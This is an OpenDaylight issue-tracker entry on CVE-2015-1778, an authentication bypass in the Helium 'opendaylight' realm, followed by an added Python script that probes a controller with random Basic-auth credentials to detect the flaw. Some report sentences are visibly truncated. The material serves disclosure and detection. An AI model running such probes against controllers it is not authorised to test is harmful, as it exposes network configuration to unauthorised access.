[CONTROLLER-1187] [SECURITY] Authentication bypass in opendaylight realm CVE-2015-1778 Created: 09/Mar/15 Updated: 14/Mar/15 Resolved: 14/Mar/15 |
| Status: | Resolved |
| Project: | controller |
| Component/s: | usermanager |
| Affects Version/s: | Helium |
| Fix Version/s: | None |
| Type: | Bug |
| Reporter: | David Jorm | Assignee: | David Jorm |
| Resolution: | Done | Votes: | 0 |
| Labels: | None |
| Remaining Estimate: | Not Specified |
| Time Spent: | Not Specified |
| Original Estimate: | Not Specified |
| Environment: | Operating System: All |
| External issue ID: | 2798 |
| Priority: | Highest |
| Description |
Flavio Fernandes reported:

Today on Helium (including SR1.1 and SR2) the neutron northbound uses basicAuth. While the rest server (port 8080) will reject an http w/out the auth header, it does not

Quick way of demonstrating this:

curl http://192.168.50.1:8080/controller/nb/v2/neutron/networks <== 401, correct

Please make sure that security issue is taken care of. Note this is not an issue in the Lithium codebase, once we changed to jetty. I did not try Hydrogen.

David Jorm investigated and found the offending code:

This will accept any username/password combination. If I change line 40 to "return null;" and recompile, then no username/password combination is accepted. It appears that the "opendaylight" realm (which uses this custom realm class) is widely used by several interfaces. I think a patch should drop the custom realm class and use UserDatabaseRealm or similar instead.

Colin Dixon is now working on a patch, targeting the SR3 release. |
| Comments |
| Comment by David Jorm [ 11/Mar/15 ] |
Proposed patch for stable/helium: https://git.opendaylight.org/gerrit/#/c/16307/ |
| Comment by David Jorm [ 14/Mar/15 ] |
The patch has been merged, and will be included in the SR3 release. |
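The report above describes the telltale behaviour of this bug: a request with no Authorization header is rejected with 401, but any username/password pair presented via HTTP Basic auth is accepted. The following probe, written here as an added example and not code from the OpenDaylight project or from anyone on this issue, turns that observation into a check a practitioner can run against a controller. It assumes the neutron northbound path from the report; the base URL, the "admin"/"admin" credentials in the constructed fixed-server stand-in, and the `vulnerable_server`/`fixed_server` functions are assumptions made only so the classifier can be exercised offline.

```python
"""Probe for an "accept any credentials" Basic-auth realm (CVE-2015-1778 pattern).

Three requests are not needed; two suffice to separate the cases that matter:
  no Authorization header      -> 401  (auth is at least nominally required)
  random Basic credentials     -> 2xx  (the realm accepts anything: bypass)
"""
import base64
import secrets
import urllib.error
import urllib.request

# Endpoint named in the issue report; any Basic-auth protected path would do.
NEUTRON_NETWORKS = "/controller/nb/v2/neutron/networks"


def basic_auth_header(username, password):
    """Build an RFC 7617 Basic credential for the given user/password."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def classify(status_no_auth, status_bogus_auth):
    """Map the two observed status codes to a verdict.

    'no-auth'      endpoint answers 2xx without any credentials
    'bypass'       401 without a header, 2xx with made-up credentials (the realm bug)
    'enforced'     401 without a header, 401/403 with made-up credentials
    'inconclusive' anything else (proxy errors, 404, redirects, ...)
    """
    if 200 <= status_no_auth < 300:
        return "no-auth"
    if status_no_auth != 401:
        return "inconclusive"
    if 200 <= status_bogus_auth < 300:
        return "bypass"
    if status_bogus_auth in (401, 403):
        return "enforced"
    return "inconclusive"


def http_status(url, headers=None, timeout=5):
    """Issue a GET and return the HTTP status code, treating 4xx/5xx as data, not errors."""
    req = urllib.request.Request(url, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe(base_url, send=http_status):
    """Run the two-request check against base_url; `send` is injectable for testing."""
    url = base_url.rstrip("/") + NEUTRON_NETWORKS
    # Fresh random credentials each run so a real account can never match by accident.
    bogus_user = "probe-" + secrets.token_hex(4)
    bogus_pass = secrets.token_hex(8)
    status_none = send(url)
    status_bogus = send(url, {"Authorization": basic_auth_header(bogus_user, bogus_pass)})
    return classify(status_none, status_bogus)


# Constructed stand-ins (assumptions, not real controllers) so the logic runs offline.
def vulnerable_server(url, headers=None, timeout=5):
    """Models the Helium behaviour from the report: header present => accepted."""
    headers = headers or {}
    return 200 if headers.get("Authorization", "").startswith("Basic ") else 401


def fixed_server(url, headers=None, timeout=5):
    """Models a realm that actually checks the credential (assumed admin/admin)."""
    headers = headers or {}
    return 200 if headers.get("Authorization") == basic_auth_header("admin", "admin") else 401


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        sys.exit("usage: probe.py http://<controller-host>:8080")
    print(sys.argv[1], probe(sys.argv[1]))
```

Run it as `python3 probe.py http://<controller-host>:8080`; a result of `bypass` is the condition this issue describes. The verdict deliberately ignores the response body, since on a vulnerable Helium controller the body for bogus credentials is the same network listing a legitimate user would get.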